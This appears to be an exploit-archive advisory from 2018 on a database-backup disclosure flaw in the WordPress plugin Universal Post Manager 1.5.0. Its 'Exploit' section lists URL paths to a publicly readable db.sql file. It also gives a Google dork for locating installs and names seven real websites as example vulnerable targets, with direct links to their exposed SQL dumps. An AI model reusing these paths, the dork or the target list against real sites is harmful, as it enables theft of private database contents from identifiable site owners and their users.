WordPress Universal Post Manager 1.5.0 Database Disclosure Vulnerability

2018-11-25
ID: 100345
CVE: None
Download vulnerable application: None
#################################################################################################
 # Exploit Title : WordPress universal-post-manager 1.5.0 Plugins Database
Backup Information Disclosure Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Vendor Homepage : wordpress.org/support/plugin/universal-post-manager/ ~
github.com/WPPlugins/universal-post-manager
+ wpplugindirectory.org/universal-post-manager/  ~
wp-plugins-directory.com/universal-post-manager
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.5.0
# Software Download Link :
github.com/WPPlugins/universal-post-manager/archive/master.zip
# Google Dorks : inurl:''/wp-content/plugins/universal-post-manager/''
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
 #################################################################################################
 # Admin Panel Login Path :
 /wp-login.php
 #################################################################################################
 # Exploit :
 /wp-content/plugins/universal-post-manager/db/db.sql
 /PATH/wp-content/plugins/universal-post-manager/db/db.sql
 /wpblog/wp-content/plugins/universal-post-manager/db/db.sql
 /wordpress/wp-content/plugins/universal-post-manager/db/db.sql
 /backups/sitebuild-backup%2010-25-2011/wp-content/plugins/universal-post-manager/db/db.sql
 #################################################################################################
 # Example Vulnerable Sites =>
 [+] unila.ac.id/wp-content/plugins/universal-post-manager/db/db.sql
 [+]
foodandwinechickie.com/wp-content/plugins/universal-post-manager/db/db.sql
 [+]
imanighana.com/wordpress/wp-content/plugins/universal-post-manager/db/db.sql
 [+] fwcnb.org/wpblog/wp-content/plugins/universal-post-manager/db/db.sql
 [+]
stumpfsgym.com/wordpress/wp-content/plugins/universal-post-manager/db/db.sql
 [+] cc-paysdesainteodile.fr/content/plugins/universal-post-manager/db/db.sql
 [+]
sitebuilder.murrayhill.com/backups/sitebuild-backup%2010-25-2011/wp-content/plugins/universal-post-manager/db/db.sql
 #################################################################################################
 # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
 ################################################################################################
1.1.11-prod (www01)